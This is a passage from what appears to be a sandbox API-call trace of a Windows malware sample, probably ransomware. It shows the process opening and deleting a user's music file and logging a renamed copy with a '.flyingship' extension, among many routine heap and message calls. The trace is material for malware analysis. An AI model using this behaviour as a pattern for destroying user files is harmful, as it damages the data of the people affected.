lpUsedDefaultChar=0x0) returned 7 [0185.375] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x7) returned 0x9c2628 [0185.375] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="memset", cchWideChar=7, lpMultiByteStr=0x9c2628, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="memset", lpUsedDefaultChar=0x0) returned 7 [0185.375] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0185.376] GetProcAddress (hModule=0x75c90000, lpProcName="memset") returned 0x75c99790 [0185.376] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0185.376] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0185.376] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0185.376] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0185.376] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0185.376] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0c8 | out: hHeap=0x8a0000) returned 1 [0185.376] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0185.376] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0185.376] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0185.376] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0185.376] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0185.376] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0185.376] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0185.376] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0185.376] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0185.376] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0185.377] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0185.377] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0185.377] FreeLibrary (hLibModule=0x75c90000) returned 1 [0185.377] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0185.377] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0185.377] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0185.377] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deba0 | out: hHeap=0x8a0000) returned 1 [0185.377] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df078 | out: hHeap=0x8a0000) returned 1 [0185.377] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0185.377] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0185.377] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0185.377] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0185.377] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0185.377] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0185.377] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0185.377] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0185.377] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0185.377] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0185.377] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0185.377] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0185.377] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0185.377] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0185.377] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0185.377] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0185.377] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0185.378] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0185.378] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0185.378] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0185.378] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0185.378] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0185.378] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0185.378] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0185.378] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0185.378] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0185.378] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0185.378] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0185.378] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0185.378] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0185.378] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0185.378] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0185.378] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0185.378] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0185.378] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0185.378] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0185.379] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0185.379] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0185.379] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0185.379] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0185.379] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0185.379] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0185.379] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\LWhz.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\etyjolzsqisxnk0ol\\fgmpl3n\\lwhz.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x120 [0185.380] FreeLibrary (hLibModule=0x75990000) returned 1 [0185.380] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0185.380] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0185.380] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0185.380] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0185.380] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0185.380] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0185.380] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0185.382] FreeLibrary (hLibModule=0x75990000) returned 1 [0185.382] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0185.382] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0185.382] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0185.382] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0185.382] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0185.382] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0185.382] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0185.382] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0185.384] FreeLibrary (hLibModule=0x75990000) returned 1 [0185.384] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0185.384] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0185.384] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0185.384] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\LWhz.m4a", nBufferLength=0x7fff, lpBuffer=0x86efc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\LWhz.m4a", lpFilePart=0x0) returned 0x46 [0185.385] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\LWhz.m4a", lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdc9942e0, ftCreationTime.dwHighDateTime=0x1d5e43c, ftLastAccessTime.dwLowDateTime=0xf87f1f10, ftLastAccessTime.dwHighDateTime=0x1d5e37f, ftLastWriteTime.dwLowDateTime=0x13bc89e0, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0xcfe0, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="LWhz.m4a", cAlternateFileName="")) returned 0x90af58 [0185.386] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\LWhz.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\etyjolzsqisxnk0ol\\fgmpl3n\\lwhz.m4a")) returned 1 [0185.388] FindNextFileW (in: hFindFile=0x90af58, lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdc9942e0, ftCreationTime.dwHighDateTime=0x1d5e43c, ftLastAccessTime.dwLowDateTime=0xf87f1f10, ftLastAccessTime.dwHighDateTime=0x1d5e37f, ftLastWriteTime.dwLowDateTime=0x13bc89e0, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0xcfe0, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="LWhz.m4a", cAlternateFileName="")) returned 0 [0185.388] FindClose (in: hFindFile=0x90af58 | out: hFindFile=0x90af58) returned 1 [0185.388] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0185.389] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0185.389] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0185.389] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0185.389] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="a", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0185.389] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4a", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0185.389] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="m4a", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0185.389] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".m4a", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0185.389] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0185.389] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0185.389] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0185.389] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0185.389] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0185.391] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0185.391] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f424 | out: lpNewFilePointer=0x0) returned 1 [0185.391] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0185.391] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0185.391] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0185.391] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0xbda010 [0185.392] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0185.392] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0185.392] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f414 | out: lpNewFilePointer=0x0) returned 1 [0185.392] ReadFile (in: hFile=0x120, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87f43c*=0x22e9, lpOverlapped=0x0) returned 1 [0185.392] ReadFile (in: hFile=0x120, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87f43c*=0x0, lpOverlapped=0x0) returned 1 [0185.392] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x22e9, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0185.392] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0185.393] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0185.393] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbda010 | out: hHeap=0x8a0000) returned 1 [0185.393] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0185.393] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0185.393] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\LWhz.flyingship.m4a\r\n", cchWideChar=84, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 84 [0185.393] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x54) returned 0x8c4a48 [0185.393] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\LWhz.flyingship.m4a\r\n", cchWideChar=84, lpMultiByteStr=0x8c4a48, cbMultiByte=84, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\LWhz.flyingship.m4a\r\n", lpUsedDefaultChar=0x0) returned 84 [0185.393] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0185.393] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x60) returned 0x9a5d78 [0185.393] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8c4a48 | out: hHeap=0x8a0000) returned 1 [0185.393] WriteFile (in: hFile=0x120, lpBuffer=0x9a5d78*, nNumberOfBytesToWrite=0x53, lpNumberOfBytesWritten=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0x9a5d78*, lpNumberOfBytesWritten=0x87f43c*=0x53, lpOverlapped=0x0) returned 1 [0185.393] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9a5d78 | out: hHeap=0x8a0000) returned 1 [0185.393] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0185.393] CloseHandle (hObject=0x120) returned 1 [0185.407] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0185.407] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0185.407] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbca008 | out: hHeap=0x8a0000) returned 1 [0185.407] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af58 | out: hHeap=0x8a0000) returned 1 [0185.408] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0a8 | out: hHeap=0x8a0000) returned 1 [0185.408] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0185.408] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0185.408] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0185.408] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x900038 | out: hHeap=0x8a0000) returned 1 [0185.409] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0185.410] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0185.410] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0185.410] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deb78 | out: hHeap=0x8a0000) returned 1 [0185.410] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0185.410] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90add8 | out: hHeap=0x8a0000) returned 1 [0185.410] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0185.410] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0f0 | out: hHeap=0x8a0000) returned 1 [0185.410] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0185.410] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0185.410] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0185.410] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea10 | out: hHeap=0x8a0000) returned 1 [0185.410] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8fff00 | out: hHeap=0x8a0000) returned 1 [0185.410] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0185.410] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0185.410] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0185.410] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0185.410] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0185.410] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0185.410] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0185.411] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de830 | out: hHeap=0x8a0000) returned 1 [0185.411] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0185.411] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0185.411] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0185.411] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0185.411] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0185.411] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0185.411] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8a8 | out: hHeap=0x8a0000) returned 1 [0185.411] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0185.411] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0185.411] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0185.411] HeapFree (in: 